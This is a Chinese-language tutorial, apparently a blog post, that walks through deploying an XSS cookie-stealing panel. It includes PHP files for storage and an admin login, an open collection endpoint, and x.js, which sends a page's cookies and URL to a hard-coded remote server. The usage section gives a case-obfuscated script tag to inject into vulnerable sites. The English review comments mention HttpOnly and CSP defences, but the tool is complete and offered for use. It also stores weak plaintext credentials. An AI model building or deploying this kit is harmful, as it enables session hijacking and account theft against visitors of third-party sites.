[radio color="blue" checked=""]首先建立css文件夹-并改文件名为:bootstrap.min.css[/radio]
Css源代码:
项目链接地址:https://github.com/truda8/xss-cookies/
[radio color="blue" checked="checked"]第二步:建立文件夹install/内放index.php[/radio]
源代码:
请前往项目链接地址下载和学习
[radio color="blue" checked="checked"]建立php文件:config.php [/radio]
源代码:
<?php
// Shared configuration and database handle. This file is include()d by
// index.php, login.php and server.php, so every variable defined here becomes
// a global in those scripts.
// Mysql database config
$host = "localhost";
$user = "xss";
$pass = "123456";
$dbname = "xss";
// Admin username and password (kept in plaintext; login.php compares the
// posted password directly against $admin_pass with ===)
$admin_user = "admin";
$admin_pass = "123456";
// Server address. NOTE(review): nothing else on this page reads $server_url —
// x.js carries its own hard-coded endpoint — so editing it here has no effect
// unless the install/ script (not shown) uses it.
$server_url = "http://127.0.0.1/server.php";
// Create connection
$conn = new mysqli($host, $user, $pass, $dbname);
// Check connection
if ($conn->connect_error) {
// NOTE(review): the raw driver message is written straight into the HTTP
// response; log it server-side and return a generic error instead.
die("Connection failed: " . $conn->connect_error);
}
?>
[radio color="blue" checked="checked"]建立index.php文件[/radio]
源代码:
<?php
// Admin listing page: requires an authenticated session (the flag is set by
// login.php), then renders every row of the `cookies` table.
include("./config.php");
session_start();
// Check whether the admin is logged in
if (!isset($_SESSION["admin"]) or $_SESSION["admin"] !== true) {
// Not authenticated: clear the flag and redirect to the login page.
// header() is valid here because no output has been sent yet.
$_SESSION["admin"] = false;
header("Location: " . "./login.php");
die();
}
?>
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Xss Cookies</title>
<link rel="stylesheet" href="css/bootstrap.min.css">
<!-- NOTE(review): unlike login.php, this document never loads the Notiflix
     script, yet both inline scripts below call Notiflix.* — confirm whether
     the <script src="js/notiflix-aio-2.7.0.min.js"> line was dropped. -->
<style>
/* Keep the long URL / cookie columns from stretching the table */
td:nth-child(2) {
max-width: 180px;
}
td:nth-child(3) {
max-width: 360px;
}
</style>
</head>
<body class="bg-dark">
<div class="container">
<div class="card text-white bg-success text-center m-3 p-3">
<h3 class="card-header bg-success">🍪Xss Cookies</h3>
<div class="card-body table-responsive">
<table class="table table-hover text-white">
<thead>
<tr>
<th scope="col">Id</th>
<!-- NOTE(review): "col-2" is not a valid scope value; "col" is meant here -->
<th scope="col-2">Url</th>
<th scope="col">Cookies</th>
<th scope="col">Client ip</th>
<th scope="col">Add date</th>
</tr>
</thead>
<tbody>
<script>
// Spinner shown while the rows below are emitted (see the Notiflix note above)
Notiflix.Loading.Hourglass('Loading...');
</script>
<?php
// HTML-escape a stored value for element content or a double-quoted attribute.
// ENT_QUOTES also converts single quotes; the final false disables double-encoding.
function p($value) {
return htmlspecialchars($value, ENT_QUOTES, 'UTF-8', false);
}
$sql = "SELECT id, target_url, cookies, client_ip, add_date FROM cookies;";
$result = $conn->query($sql);
// NOTE(review): query() returns false on error, in which case ->num_rows is
// read from a bool; check $result before using it.
if ($result->num_rows > 0) {
// echo data
while ($row = $result->fetch_assoc()) {
echo '<tr>';
// scope="row" is only meaningful on <th>; browsers ignore it on <td>.
echo '<td scope="row">' . p($row["id"]) . '</td>';
// Every column originates from server.php, which accepts unauthenticated
// POSTs, so all of it is untrusted. p() keeps the value from breaking out of
// the attribute but does not constrain the URL scheme; limiting href to
// http/https and adding rel="noopener noreferrer" beside target="_blank"
// would complete the protection of this page.
echo '<td><a class="link-info" href="' . p($row["target_url"]) . '" target="_blank">' . p($row["target_url"]) . '</a></td>';
echo '<td scope="row">' . p($row["cookies"]) . '</td>';
echo '<td scope="row">' . p($row["client_ip"]) . '</td>';
echo '<td scope="row">' . p($row["add_date"]) . '</td>';
echo '</tr>';
}
}
// NOTE(review): $conn is left open here (server.php closes its handle explicitly).
?>
<script>
Notiflix.Loading.Remove();
</script>
</tbody>
</table>
</div>
<div class="card-footer bg-success text-gray-600">
In the end.
</div>
</div>
</div>
</body>
</html>
[radio color="blue" checked="checked"]建立登录php文件:/login.php [/radio]
源代码:
<!DOCTYPE html>
<!-- Login page for the admin listing. The form posts back to this same file;
     the PHP block inside the <script> at the bottom handles the POST and
     emits a Notiflix call inline. -->
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login - Xss Cookies</title>
<link rel="stylesheet" href="css/bootstrap.min.css">
<style>
/* Full-height layout so the form can be vertically centred */
html,body {
margin: 0;
padding: 0;
height: 100vh;
}
.container {
height: 100vh;
}
.row {
height: 100vh;
}
</style>
<script src="js/notiflix-aio-2.7.0.min.js"></script>
</head>
<body class="bg-dark">
<div class="container">
<div class="row align-items-center justify-content-md-center">
<div class="col-sm-12 col-lg-6">
<h3 class="text-light">Xss Cookies 登录</h3>
<form class="text-light" method="POST" action="./login.php">
<div class="mb-3">
<label for="username" class="form-label">用户名</label>
<input type="text" class="form-control" id="username" name="username">
</div>
<div class="mb-3">
<label for="password" class="form-label">密码</label>
<input type="password" class="form-control" id="password" name="password">
</div>
<div class="mb-3">
<!-- NOTE(review): this checkbox has no name attribute and the POST handler
     below never reads it, so "remember password" is cosmetic only. -->
<input type="checkbox" class="form-check-input" id="Check">
<label class="form-check-label" for="Check">记住密码</label>
</div>
<button type="submit" class="btn btn-primary">立即登录</button>
</form>
</div>
</div>
</div>
<script>
Notiflix.Report.Init({
messageFontSize:'18px',
});
<?php
// POST handler. NOTE(review): session_start() runs here, after the entire HTML
// document above has already been emitted. The session cookie header can only
// still be sent if output buffering is enabled; otherwise PHP warns "headers
// already sent" and the redirect target's auth check will not see the flag.
if ($_SERVER["REQUEST_METHOD"] == "POST") {
include("./config.php");
session_start();
// NOTE(review): no isset() guard — a POST missing either field raises a notice.
$username = $_POST["username"];
$password = $_POST["password"];
// Plaintext comparison against the values in config.php. hash_equals() would
// make the check constant-time, and session_regenerate_id() after success
// would prevent session fixation.
if ($username === $admin_user && $password === $admin_pass) {
$_SESSION["admin"] = true;
// Success: emit JS into the surrounding <script> that shows the report and
// redirects to index.php (on button click or after 3 s).
$success = "
Notiflix.Report.Success('登录成功',
'即将跳转到管理页面...',
'立即跳转',
function(){
window.location.href = './index.php';
});
setTimeout(function(){
window.location.href = './index.php';
},3000);
";
echo $success;
} else {
// Failure: show the error report; the session flag is left untouched.
$error = "Notiflix.Report.Failure('登录失败',
'账号或密码错误!',
'确定');
";
echo $error;
}
}
?>
</script>
</body>
</html>
[radio color="blue" checked="checked"]建立客户端php文件:server.php[/radio]
源代码:
<?php
// Collection endpoint: stores a POSTed (url, cookies) pair together with the
// caller's IP. NOTE(review): there is no authentication or origin check, so
// any client that can reach this URL can insert rows; everything stored here
// is untrusted input for the listing page.
include('./config.php');
// Allow every origin, so a cross-site Ajax call is not blocked by the browser
header('Access-Control-Allow-Origin:*');
// Determine the client IP. REMOTE_ADDR is tested first, so the forwarded-header
// branches only run when REMOTE_ADDR is absent — behind a reverse proxy this
// records the proxy's address rather than the client's. Those headers are
// set by the caller in any case, so the value is a hint, not an identity.
function get_client_ip() {
$ip = null;
if (isset($_SERVER["REMOTE_ADDR"])) {
$ip = $_SERVER["REMOTE_ADDR"];
} else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
// First entry of a comma-separated list
$ip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
$ip = trim(current($ip));
} else if (isset($_SERVER["HTTP_X_REAL_IP"])) {
$ip = $_SERVER["HTTP_X_REAL_IP"];
}
return $ip;
}
// Get client data
// NOTE(review): no isset() — a request without these fields raises notices
// before the truthiness guard below is reached.
$url = $_POST['url'];
$cookies = $_POST['cookies'];
$client_ip = get_client_ip();
// Save data only when all three values are truthy (so "0" is skipped as well)
if ($url && $cookies && $client_ip) {
// Prepared statement with bound parameters — the raw POST values never reach
// the SQL text. No length limit is applied before the insert.
$add_client = $conn->prepare("INSERT INTO cookies (target_url, cookies, client_ip) VALUES (?, ?, ?)");
$add_client->bind_param("sss", $url, $cookies, $client_ip);
$add_client->execute();
$add_client->close();
}
// Always answers "1", whether or not a row was stored
echo 1;
$conn->close();
[radio color="blue" checked="checked"]建立cookie js 获取文件:x.js[/radio]
源代码:
// Reads every cookie visible to script on the current page and POSTs it, with
// the page URL, to the collection endpoint. Defender notes: document.cookie
// only exposes cookies set without the HttpOnly attribute, so marking session
// cookies HttpOnly keeps them out of this collection; a Content-Security-Policy
// restricting script-src and connect-src blocks both the script load and the
// outgoing request.
let allCookies = document.cookie;
// NOTE(review): "sererUrl" is a typo for serverUrl (harmless, used consistently).
// The address is hard-coded here and is independent of config.php's $server_url.
let sererUrl = "http://192.168.3.60/server.php";
let currentUrl = window.location.href;
// Sends the two module-level values as a form-encoded POST; the response is ignored.
function sendCookie() {
const xhttp = new XMLHttpRequest();
xhttp.open("POST", sererUrl, true);
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
let data = "cookies=" + allCookies + "&url=" + currentUrl;
xhttp.send(data);
}
// Only fire when there is something to send; the values are URL-encoded in
// place first so that sendCookie() builds a well-formed body.
if (allCookies && currentUrl) {
// Url encode
allCookies = encodeURIComponent(allCookies);
currentUrl = encodeURIComponent(currentUrl);
sendCookie();
}
食用方法和安装:
修改配置文件 config.php 修改以下信息
MySQL 数据库信息
管理员账号密码
服务端地址
- 当前目录所有文件部署到 php web server
- 打开
http://域名/install/
进行安装
二、使用 - 将如下代码植入怀疑出现 xss 的地方
<sCRiPt sRC=http://域名/x.js></sCrIpT>
- 打开
http://域名/
登录查看 cookies 信息
点我进入项目链接地址